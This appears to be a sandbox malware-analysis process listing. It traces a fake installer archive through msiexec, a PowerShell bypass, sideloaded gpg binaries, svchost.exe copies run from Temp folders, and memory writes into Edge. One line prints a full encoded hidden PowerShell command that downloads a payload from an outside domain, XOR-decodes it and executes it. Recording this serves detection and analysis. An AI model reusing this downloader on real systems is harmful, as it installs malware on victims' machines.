PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\" -spe -an -ai#7zMap25084:92:7zEvent26371

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\x32_x64_installer\setup\" -spe -an -ai#7zMap24552:104:7zEvent9109

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\x32_x64_installer\setup\setup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7F445D1A15E1E8DFF56A52947A4EF254

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssEFC8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrEFB7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e 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

C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2c4,0x2c8,0x2cc,0x2c0,0x35c,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2956 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3088 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3428 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5012 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:2

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5280 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5372 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4848 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4724 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3340 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5828 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5892 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6152 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6608 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6784 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6792 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5236 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3624 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6040 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6568 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x50c 0x534

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4204 --field-trial-handle=2284,i,9628302495586897155,9451426348465895641,262144 --variations-seed-version /prefetch:8

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /n "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\locale\pureviolet.pot"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e …

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\gPbvjrqJdNjoBNl\svchost.exe"

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4912 -ip 4912

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e …

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AaQBpAGcAZwBnAGsAawBsAC4AbQBvAG4AcwB0AGUAcgAvAG4AZQB3AGQAcgBvAHAALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2056

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4912 -ip 4912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 2092

C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\b4Tvo7dAqteQ0zL\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\UhwuE7JmPUqUfRj\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e …

C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Ko0JPYBqUfWBZzu\svchost.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3456 -ip 3456

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2496 -ip 2496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 2056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3456 -ip 3456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2496 -ip 2496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2060

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x2c4,0x7ff8a4342e98,0x7ff8a4342ea4,0x7ff8a4342eb0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2332 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2496 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3400 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3464 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4048 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5016 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4908 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5284 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5044 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5204 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2336,i,1705920347122441425,13972837613063250277,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe

